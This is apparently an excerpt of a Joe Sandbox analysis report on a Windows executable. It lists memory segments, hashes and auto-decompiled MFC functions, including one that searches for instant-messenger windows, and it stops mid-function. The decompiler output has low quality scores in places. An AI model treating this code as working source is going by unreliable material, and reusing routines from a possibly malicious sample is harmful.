Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #5602$strstr$#5857
String ID:
API String ID: 3537604326-0
Opcode ID: 23aaaef53e612fe712526a1b4c56410da43d85d995ff2dcccefd7662c45e512a
Instruction ID: deeabae32b8c25dc12173e7d4dd1425a429a38cb1d6d66e93349bb875bbcb849
Opcode Fuzzy Hash: 23aaaef53e612fe712526a1b4c56410da43d85d995ff2dcccefd7662c45e512a
Instruction Fuzzy Hash: C7114435341705AFEA20A6369C82FB773DEEBD9716F10142FF002971C2CA69BC044B18

Uniqueness

Uniqueness Score: -1.00%

Function 0040EC8E, Relevance: 10.6, APIs: 7, Instructions: 52
windowCOMMON

Download Yara Rule

C-Code - Quality: 45%

			E0040EC8E(void* __ecx, void* __eflags) {
				intOrPtr* _t18;
				long _t20;
				void* _t35;
				void* _t37;

				E0043E4E0(0x440220, _t37);
				_push(__ecx);
				_push(__ecx);
				_t35 = __ecx;
				 *(_t37 - 0x10) = SendMessageA( *(__ecx + 0x248), 0x1004, 0, 0);
				_t18 = E00429029(_t37 - 0x14, 0xe00d);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( *_t18);
				_push( *(_t37 - 0x10));
				 *(_t37 - 4) = 0;
				_push(1);
				L0043DF88();
				 *(_t37 - 4) =  *(_t37 - 4) | 0xffffffff;
				L0043DD36();
				L0043DF9A();
				_t20 = SendMessageA( *(_t35 + 0x248), 0x1017,  *(_t37 - 0x10), 0);
				_push(_t20);
				L0043DD9C();
				 *[fs:0x0] =  *((intOrPtr*)(_t37 - 0xc));
				return _t20;
			}

0x0040ec93
0x0040ec98
0x0040ec99
0x0040eca6
0x0040ecb6
0x0040ecc2
0x0040eccb
0x0040eccc
0x0040eccd
0x0040ecce
0x0040eccf
0x0040ecd0
0x0040ecd9
0x0040ecdc
0x0040ecde
0x0040ece3
0x0040ecea
0x0040ecf5
0x0040ed09
0x0040ed0b
0x0040ed0c
0x0040ed17
0x0040ed1f

APIs

__EH_prolog.LIBCMT ref: 0040EC93
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040ECB4

Part of subcall function 00429029: #1168.MFC42(00000002), ref: 00429052
Part of subcall function 00429029: LoadStringA.USER32 ref: 0042906A
Part of subcall function 00429029: #537.MFC42(00000001), ref: 0042907A

#3998.MFC42(00000001,?,?,00000000,00000000,00000000,00000000), ref: 0040ECDE
#800.MFC42(00000001,?,?,00000000,00000000,00000000,00000000), ref: 0040ECEA
#5981.MFC42(00000001,?,?,00000000,00000000,00000000,00000000), ref: 0040ECF5
SendMessageA.USER32(?,00001017,?,00000000), ref: 0040ED09
#2864.MFC42(00000000), ref: 0040ED0C

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: MessageSend$#1168#2864#3998#537#5981#800H_prologLoadString
String ID:
API String ID: 1514844440-0
Opcode ID: 43cd8eb62e9f9f25e3149491fd485a222a6cd2dcb13c72d8be124b6338c3f50d
Instruction ID: 30f56704bdc665a8c60f1639930bc5770bfb9fdae95e9a63c0478b0e6c2e91de
Opcode Fuzzy Hash: 43cd8eb62e9f9f25e3149491fd485a222a6cd2dcb13c72d8be124b6338c3f50d
Instruction Fuzzy Hash: B90116B1900209BEE7149BA5EC86EFFB77CFB49358F10052EB115A21A1DAB45D408A64

Uniqueness

Uniqueness Score: -1.00%

Function 0041A8D6, Relevance: 10.5, APIs: 7, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E0041A8D6(intOrPtr __eax, void* __ecx) {
				void* _t17;
				long _t18;
				void* _t27;

				_push(1);
				_push(0);
				_t27 = __ecx;
				_push(0x42e);
				L0043E2DC();
				_push(0x64);
				 *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x288)) + 0x100)) = __eax;
				_push( *((intOrPtr*)(__ecx + 0x288)) + 4);
				_push(0x42d);
				L0043E078();
				_push(0x32);
				_push( *((intOrPtr*)(__ecx + 0x288)) + 0x68);
				_push(0x42f);
				L0043E078();
				_push(0x32);
				_push( *((intOrPtr*)(__ecx + 0x288)) + 0x9a);
				_push(0x430);
				L0043E078();
				_push(0x32);
				_t17 =  *((intOrPtr*)(__ecx + 0x288)) + 0xcc;
				_push(_t17);
				_push(0x432);
				L0043E078();
				_push(0x44a);
				L0043E066();
				_t18 = SendMessageA( *(_t17 + 0x20), 0x147, 0, 0);
				 *( *(_t27 + 0x288)) = _t18;
				return _t18;
			}

0x0041a8d7
0x0041a8d9
0x0041a8db
0x0041a8dd
0x0041a8e2
0x0041a8ed
0x0041a8ef
0x0041a900
0x0041a901
0x0041a906
0x0041a911
0x0041a918
0x0041a919
0x0041a91e
0x0041a929
0x0041a932
0x0041a933
0x0041a938
0x0041a943
0x0041a945
0x0041a94c
0x0041a94d
0x0041a952
0x0041a957
0x0041a95e
0x0041a96f
0x0041a97c
0x0041a97e

APIs

#3095.MFC42(0000042E,00000000,00000001), ref: 0041A8E2
#3098.MFC42(0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A906
#3098.MFC42(0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A91E
#3098.MFC42(00000430,?,00000032,0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A938
#3098.MFC42(00000432,?,00000032,00000430,?,00000032,0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A952
#3092.MFC42(0000044A,00000432,?,00000032,00000430,?,00000032,0000042F,?,00000032,0000042D,?,00000064,0000042E,00000000,00000001), ref: 0041A95E
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0041A96F

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3098$#3092#3095MessageSend
String ID:
API String ID: 257495916-0
Opcode ID: b1c4c752cafa6c3239db450b5ae815dbe70a5b05f9cdd894e040348c7e26eaa7
Instruction ID: 23bf44550fae4f19a05b060bbf3ef36a8ddec6c02516f4313440ad4bc3351154
Opcode Fuzzy Hash: b1c4c752cafa6c3239db450b5ae815dbe70a5b05f9cdd894e040348c7e26eaa7
Instruction Fuzzy Hash: D501A7B5782320ABFA649B62CC57FEA3665DB48F44F80411DB3499F2E1CEE56800C768

Uniqueness

Uniqueness Score: -1.00%

Function 0041C11B, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E0041C11B(void* __ecx) {
				void* __esi;
				void* _t8;
				void* _t9;
				long _t11;
				void* _t13;
				void* _t21;

				_t21 = __ecx;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(__ecx);
				_push(1);
				_t9 = L00404F47(_t8, __ecx + 0x12c, __ecx);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t21);
				_push(2);
				L00404F47(_t9, _t21 + 0xd8, _t21);
				_t11 = GetSysColor(0xf);
				_push("Verdana");
				 *(_t21 + 0xb0) = _t11;
				 *((intOrPtr*)(_t21 + 0xa8)) = 0x2bc;
				 *((intOrPtr*)(_t21 + 0xa4)) = 0xe;
				L0043DDD2();
				_push(0x42d);
				L0043E066();
				SendMessageA( *(_t11 + 0x20), 0xcc, 0x2a, 0);
				_t13 = 1;
				return _t13;
			}

0x0041c11f
0x0041c121
0x0041c12b
0x0041c132
0x0041c138
0x0041c139
0x0041c13a
0x0041c13b
0x0041c143
0x0041c148
0x0041c14a
0x0041c14b
0x0041c14c
0x0041c14d
0x0041c14e
0x0041c156
0x0041c15d
0x0041c163
0x0041c16e
0x0041c174
0x0041c17e
0x0041c188
0x0041c18d
0x0041c194
0x0041c1a5
0x0041c1ad
0x0041c1b2

APIs

#4710.MFC42 ref: 0041C121
GetSysColor.USER32(0000000F), ref: 0041C15D
#860.MFC42 ref: 0041C188
#3092.MFC42(0000042D), ref: 0041C194
SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041C1A5

Strings

Verdana, xrefs: 0041C163

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092#4710#860ColorMessageSend
String ID: Verdana
API String ID: 3831384366-987297809
Opcode ID: 4c792ba07d881f36dee2735293464de8265ab96a199f39e5156c7443164c8bb3
Instruction ID: be0b6bc33a9ed9147f802c31bd2899f792ad526cbf5f0fa57aac85c9bccff80c
Opcode Fuzzy Hash: 4c792ba07d881f36dee2735293464de8265ab96a199f39e5156c7443164c8bb3
Instruction Fuzzy Hash: 4D0167713417047BE230A762DC46FA77A58DF86B55F00046EF39A6A1D1CBF52844C769

Uniqueness

Uniqueness Score: -1.00%

Function 0042AF2E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E0042AF2E(intOrPtr* __ecx) {
				void* __esi;
				void* _t21;
				void* _t22;
				void* _t23;
				intOrPtr* _t44;
				void* _t46;

				E0043E4E0(0x443281, _t46);
				_push(__ecx);
				_t44 = __ecx;
				_push( *((intOrPtr*)(_t46 + 8)));
				 *((intOrPtr*)(_t46 - 0x10)) = __ecx;
				_t21 = E0040E7C0(__ecx, 0x74);
				 *(_t46 - 4) =  *(_t46 - 4) & 0x00000000;
				_t22 = L00404F04(_t21, __ecx + 0x70, __ecx);
				 *(_t46 - 4) = 1;
				_t23 = L00404F04(_t22, _t44 + 0xc4, _t44);
				 *(_t46 - 4) = 2;
				L00404F04(_t23, _t44 + 0x118, _t44);
				 *(_t46 - 4) = 3;
				L0043DF64();
				 *((intOrPtr*)(_t44 + 0x16c)) = 0x445930;
				 *(_t46 - 4) = 4;
				L0043DF64();
				 *((intOrPtr*)(_t44 + 0x1ac)) = 0x446000;
				 *(_t46 - 4) = 5;
				L0043DF64();
				 *((intOrPtr*)(_t44 + 0x1ec)) = 0x445930;
				 *(_t46 - 4) = 6;
				L0043E3A2();
				 *_t44 = 0x4497d0;
				 *[fs:0x0] =  *((intOrPtr*)(_t46 - 0xc));
				return _t44;
			}

0x0042af33
0x0042af38
0x0042af3c
0x0042af3e
0x0042af41
0x0042af46
0x0042af4b
0x0042af52
0x0042af5d
0x0042af61
0x0042af6c
0x0042af70
0x0042af7b
0x0042af81
0x0042af8b
0x0042af93
0x0042af99
0x0042af9e
0x0042afaa
0x0042afb0
0x0042afb5
0x0042afbd
0x0042afc1
0x0042afc9
0x0042afd4
0x0042afdc

APIs

__EH_prolog.LIBCMT ref: 0042AF33

Part of subcall function 0040E7C0: #324.MFC42(?,00000000,?,?,00403EF4,000000C2,?), ref: 0040E7CB

#567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF81
#567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AF99
#567.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFB0
#384.MFC42(?,00000000,?,00422424,00000000), ref: 0042AFC1

Strings

0YD, xrefs: 0042AF86

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #567$#324#384H_prolog
String ID: 0YD
API String ID: 394078367-3252838166
Opcode ID: dc23be869d9b8466c084cab707c5b2efd2b5d3938143922a1de2a968616e30a2
Instruction ID: 6f8cde3231a6a0ee0d25678e51072f5aee364cb030d00bdc28347bb88c39bc10
Opcode Fuzzy Hash: dc23be869d9b8466c084cab707c5b2efd2b5d3938143922a1de2a968616e30a2
Instruction Fuzzy Hash: 8011E770900744DEDB11EF75C8857DEFBE0AF55318F00846FE59657282CB781A08C7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00409ED6, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409ED6(void* __ecx, struct HWND__* _a4, char* _a8) {
				struct HWND__* _t14;
				void* _t19;

				_t19 = __ecx;
				if(_a4 != 0) {
					if(strncmp(_a8, "IMWindowClass", 0xd) != 0 || FindWindowExA(_a4, 0, "DirectUIHWND", 0) != 0) {
						goto L1;
					} else {
						_t14 = FindWindowExA(_a4, 0,  *(_t19 + 4), 0);
						if(_t14 == 0) {
							goto L1;
						}
						return FindWindowExA(_a4, _t14,  *(_t19 + 4), 0) & 0xffffff00 | _t15 != 0x00000000;
					}
				}
				L1:
				return 0;
			}

0x00409ee1
0x00409ee3
0x00409efe
0x00000000
0x00409f16
0x00409f1f
0x00409f23
0x00000000
0x00000000
0x00000000
0x00409f32
0x00409efe
0x00409ee5
0x00000000

APIs

strncmp.MSVCRT(?,IMWindowClass,0000000D), ref: 00409EF3
FindWindowExA.USER32 ref: 00409F10
FindWindowExA.USER32 ref: 00409F1F
FindWindowExA.USER32 ref: 00409F2E

Strings

DirectUIHWND, xrefs: 00409F07
IMWindowClass, xrefs: 00409EEB

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: FindWindow$strncmp
String ID: DirectUIHWND$IMWindowClass
API String ID: 3975895692-4179751236
Opcode ID: b34562ae25f393f4f4a756d588126caf2af67be14a25688c304ecf65b9baf811
Instruction ID: cfe08eb8aef9a55a4dcc8363e0b7a273b0818594b5256c27cb3c22d74076a4c5
Opcode Fuzzy Hash: b34562ae25f393f4f4a756d588126caf2af67be14a25688c304ecf65b9baf811
Instruction Fuzzy Hash: 48F0AF7220010ABFEF108E51DC81E67BB5CEB51799B118033F90896192DB369D51D6E4

Uniqueness

Uniqueness Score: -1.00%

Function 0041F788, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0041F788(signed int __ecx) {
				intOrPtr _v28;
				intOrPtr _v48;
				signed char* _v52;
				char* _v68;
				signed int _v76;
				struct tagOFNA _v80;
				void _v339;
				signed char _v340;
				int _t25;
				signed int _t26;
				signed int _t28;

				_v340 = _v340 & 0x00000000;
				_t26 = __ecx;
				_t28 = 0x40;
				memset( &_v339, 0, _t28 << 2);
				asm("stosw");
				asm("stosb");
				memset( &_v80, 0, 0x4c);
				_v80 = 0x4c;
				if(_t26 != 0) {
					_v76 =  *((intOrPtr*)(_t26 + 0x20));
				} else {
					_v76 = _v76 & _t26;
				}
				_v68 = "Program files (*.exe)";
				_v52 =  &_v340;
				_v48 = 0x104;
				_v28 = 0x1804;
				_t25 = GetOpenFileNameA( &_v80);
				if(_t25 != 0) {
					_push(_v52);
					_push(0x42d);
					L0043E066();
					L0043E15C();
					return _t25;
				}
				return _t25;
			}

0x0041f791
0x0041f79a
0x0041f7a0
0x0041f7a7
0x0041f7a9
0x0041f7ab
0x0041f7b4
0x0041f7bc
0x0041f7c5
0x0041f7cf
0x0041f7c7
0x0041f7c7
0x0041f7c7
0x0041f7d8
0x0041f7df
0x0041f7e6
0x0041f7ed
0x0041f7f4
0x0041f7fc
0x0041f7fe
0x0041f803
0x0041f808
0x0041f80f
0x00000000
0x0041f80f
0x0041f817

APIs

memset.MSVCRT ref: 0041F7B4
GetOpenFileNameA.COMDLG32(0000004C), ref: 0041F7F4
#3092.MFC42(0000042D,?), ref: 0041F808
#6199.MFC42(0000042D,?), ref: 0041F80F

Strings

tHE, xrefs: 0041F7D8
L, xrefs: 0041F7BC

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092#6199FileNameOpenmemset
String ID: L$tHE
API String ID: 448559069-429902498
Opcode ID: ab53499e445719148970241ad1b45d172f187cf0af91510b55aa365b685c1d12
Instruction ID: db4678e19c5d7651d08ff3f587fb0977872576650f95b19ea9f3db0acd2cba7b
Opcode Fuzzy Hash: ab53499e445719148970241ad1b45d172f187cf0af91510b55aa365b685c1d12
Instruction Fuzzy Hash: A80144B1E00208ABEF119FE5DC45BDD7BB4AB48708F10007AE614A62C1EBB8554D8B59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CC90, Relevance: 10.5, APIs: 7, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040CC90(intOrPtr* __ecx) {
				struct tagRECT _v20;
				struct HWND__* _t11;
				void* _t17;
				struct tagRECT* _t23;
				intOrPtr* _t25;

				_t25 = __ecx;
				_t23 = __ecx + 0xb4;
				GetWindowRect( *(__ecx + 0x20), _t23);
				_t11 = GetParent( *(_t25 + 0x20));
				_push(_t11);
				L0043DD9C();
				if(_t11 != 0) {
					_push(_t23);
					L0043E02A();
				}
				GetClientRect( *(_t25 + 0x20),  &_v20);
				L0043E1B0();
				L0043E1AA();
				 *((intOrPtr*)( *_t25 + 0xc8))(_t25,  *((intOrPtr*)(_t25 + 0x50)),  &_v20, 1, _t25, 0);
				_t17 = 1;
				return _t17;
			}

0x0040cc97
0x0040cc9a
0x0040cca4
0x0040ccad
0x0040ccb3
0x0040ccb4
0x0040ccbb
0x0040ccbd
0x0040ccc0
0x0040ccc0
0x0040cccc
0x0040ccda
0x0040cceb
0x0040ccf4
0x0040ccfc
0x0040cd00

APIs

GetWindowRect.USER32 ref: 0040CCA4
GetParent.USER32(?), ref: 0040CCAD
#2864.MFC42(00000000), ref: 0040CCB4
#6880.MFC42(?,00000000), ref: 0040CCC0
GetClientRect.USER32 ref: 0040CCCC
#2122.MFC42(?,00000000), ref: 0040CCDA
#1088.MFC42(?,?,?,00000001,?,00000000), ref: 0040CCEB

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: Rect$#1088#2122#2864#6880ClientParentWindow
String ID:
API String ID: 528508948-0
Opcode ID: ec4e73319e61eebf21c502b96aae2b37e40210c7b2dbe564287054474a251a84
Instruction ID: 157085a9b3a93409adb47049d8d7d470a121d65b512c7c0bb7b6df7e73e1aff1
Opcode Fuzzy Hash: ec4e73319e61eebf21c502b96aae2b37e40210c7b2dbe564287054474a251a84
Instruction Fuzzy Hash: A9016232211210ABDB20ABB5DC09FAB77BDFFC9704F04092DF646E61A1DBB5A4019759

Uniqueness

Uniqueness Score: -1.00%

Function 0040FDB8, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040FDB8(struct HWND__* _a4, struct HWND__** _a8) {
				struct HWND__* _t10;
				void* _t11;
				struct HWND__* _t15;
				struct HWND__* _t19;
				struct HWND__** _t20;

				_t19 = _a4;
				GetClassNameA(_t19, 0x455358, 0x64);
				_t10 = GetParent(_t19);
				_t20 = _a8;
